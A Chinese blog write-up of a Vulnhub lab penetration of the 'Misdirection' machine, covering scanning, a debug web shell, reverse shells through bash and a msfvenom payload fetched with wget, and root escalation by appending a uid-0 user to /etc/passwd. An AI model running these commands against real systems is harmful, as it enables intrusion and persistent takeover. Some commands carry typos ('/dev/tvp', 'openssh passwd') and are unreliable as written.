freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

Misdirection靶机渗透(vulnhub)
K____k 2024-01-24 00:07:26 141656

目录

  • 一、信息收集
  • 二、web渗透
  • 三、反弹shell
  • 四、用户提权
  • 五、root提权


一、信息收集

拿到靶机后,老规矩,使用nmap进行详细扫描,这里我的kali本机ip是192.168.138.133

先扫描ip网段,252则是靶机ip

1706022001_65afd471b5835b3d8de49.png!small

接着是靶机的端口

1706022054_65afd4a6d3d6521c8e8af.png!small

信息收集到这里我的大概思路就是在页面中寻找有用信息,后通过mysql连接数据库或者使用sqlmap爆破获取用户信息

接下来是对靶机端口详细扫描

1706022369_65afd5e1e95487c002d02.png!small?1706022373030

还有靶机漏洞扫描,这里扫描出来的一些目录对我们打靶有很大的帮助

1706022643_65afd6f30c8ebaf46da3b.png!small?1706022646371

1706022652_65afd6fc16fe2c1d1082e.png!small?1706022655174

这里8080端口里面的目录一会对于渗透有很大的帮助

既然有80和8080端口,肯定少不了目录扫描,这里使用dirsearch对靶机进行目录扫描

1706022782_65afd77ec9c993ed567d4.png!small?1706022785629

二、web渗透

这里扫描完成后发现了不对劲,扫出来的目录太多了,去页面上看看

1706022869_65afd7d51646def0c0230.png!small?1706022872540

这里不好获取信息,后来我去登录注册页面尝试以后也没有发现sql注入

这是我联想到了靶机名称就是misdirection,这个80页面的信息可能在误导我们,然后我就去尝试nmap漏洞扫描的漏洞,发现8080端口下的/debug是一个页面shell

1706023219_65afd93367edac709aa60.png!small?1706023222203这就好办了,通过这个页面我们可以获得反弹shell,这里有两个方式获取反弹shell

三、反弹shell

1.在页面中输入 /bin/bash -c ‘bash -i >& /dev/tvp/192.168.138.133/1234 0>&1’ 

然后在kali本机上nc -lvnp 1234即可获得反弹shell

1706023438_65afda0e8c91208cdbfd5.png!small?1706023441433

1706023685_65afdb05d693774280d3e.png!small?1706023689019

2. 在kali上使用msf制作脚本,然后开启http服务,后在页面上wget拉取脚本,赋予执行权限,kali上nc监听,即可获得反弹shell

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.138.133 LPORT=53 -f elf > shell.elf

python3 -m http.server

wget 192.168.138.133:8000/shell.elf

chmod +x shell.elf赋予执行权限

nc -lvnp 53 先在kali上进行nc监听,再执行脚本

./shell.elf

1706024119_65afdcb74c5c0cb69b456.png!small?1706024122230

1706024131_65afdcc3913a541d637f2.png!small?1706024134385然后拉取shell文件,并赋予执行权限,在kali上监听,再执行文件,即可获得反弹shell

1706024311_65afdd77b72b361615998.png!small?1706024314586

1706024326_65afdd86c41009a91108b.png!small?1706024329681

获得shell后输入python -c 'import pty;pty.spawn("/bin/bash")' 获取交互式shell

四、用户提权

拿到shell后sudo -l发现可以拿到用户brexit的shell

1706024543_65afde5f24d27422b8ef8.png!small?1706024546293

我们cat /etc/passwd 发现brexit用户为1000

可以输入sudo -u#1000 /bin/bash 或者 sudo -u brexit /bin/bash 获取brexit权限

1706024688_65afdef0b25409f0af0d4.png!small?1706024691506

1706024843_65afdf8bc40e422b26bc0.png!small?1706024846595

五、root提权

进入brexit用户后sudo -l命令需要密码,但是刚才我们查看passwd权限时,发现用户组是brexit,且具有读写权限

1706024940_65afdfec8a4b4150473c9.png!small?1706024944353

这就好办了,我们可以通过修改或者添加用户来提权,这里我用openssh生成密码,创建新用户输入到/etc/passwd里面

这里使用openssl生成密码1

1706024998_65afe0262f106e1e0d639.png!small?1706025000960

openssh passwd -1 "1"

echo 'k1:$1$wPgAKbbR$Fz3jjvbnZmdaOpA7DvJj0/:0:0:root:/root:/bin/bash' >> /etc/passwd

1706025179_65afe0db749ab5aa51e56.png!small?1706025182414

输入到/etc/passwd里面,su k1即刚才我们创建的用户,输入密码,成功获取root权限

# 网络安全 # web安全 # 靶场攻关
本文为 K____k 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
K____k LV.2
这家伙太懒了,还未填写个人描述!
  • 3 文章数
  • 1 关注者
解决ova文件导入至vmware出现不可恢复错误的问题
2024-12-10
Nxy靶机渗透(vulnhub) 过程超级详细
2024-01-25
文章目录